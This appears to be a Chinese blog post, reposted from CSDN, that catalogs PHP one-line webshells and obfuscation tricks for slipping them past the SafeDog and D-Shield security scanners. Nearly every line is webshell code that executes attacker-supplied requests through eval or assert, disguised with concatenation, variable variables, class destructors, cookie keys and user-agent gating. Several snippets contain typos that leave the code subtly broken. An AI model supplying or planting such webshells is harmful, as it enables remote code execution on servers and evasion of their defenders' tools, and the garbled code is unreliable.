注:本次的测试环境是最新的安全狗Apache:V4.0
一句话木马:<?php eval($_REQUEST['a'])?>
1.但是这样写容易被安全狗这些拦截,所以可以考虑替换某些函数,比如eval换成assert()或者reate_function()或者是call_user_func()
2.使用end()函数来代替,可以写成:
<?php eval(end($_REQUEST)); ?>
注:密码是随便写,在安全狗上是查不出来的,但是D盾会查出一个最低价的危险,所以,如果要让D盾完全测不出来可以这样写:
<?php if($_SERVER['HTTP_USER_AGENT'] === '1'{
eval(end($_REQUEST));}
?>
3.字符拼接加双美元符
<?php
$a='ass';
$b='ert';
$funcName=$a.$b //assert
$x='funcName';
$$x($_REQUEST['a']);
?>
4.常量
<?php
defin("a","$_REQUEST['a']");eval(a);
?>
5.用函数强行分割
<?php
function a($a){
return $a;}
eval (a($_REQUEST)['hh']);
?>
6.用类分割
<?php
class User
{public $name=' ';
function_destruct(){
eval("$this->name");
}
$user=new User;
$user->name=' '.$_REQUEST['a'];
?>
7.多方式传参
<?php
$COOKIE=$_COOKIE;//得到数组
foreach($COOKIE as $key => $value)
{if($key == 'assert'){
$key($_REQUEST['a']);
}
}
?>
8.CTF中看到的一个手法(但是D盾可以发现这个木马)
<?php
$a=get_define_functions();
$a['internal'][841]($_REQUEST['hh']);
?>
注:$a['internal'][841]表示的是assert
来源:CSDN
作者:fthgb
链接:https://blog.csdn.net/qq_30787769/article/details/103469700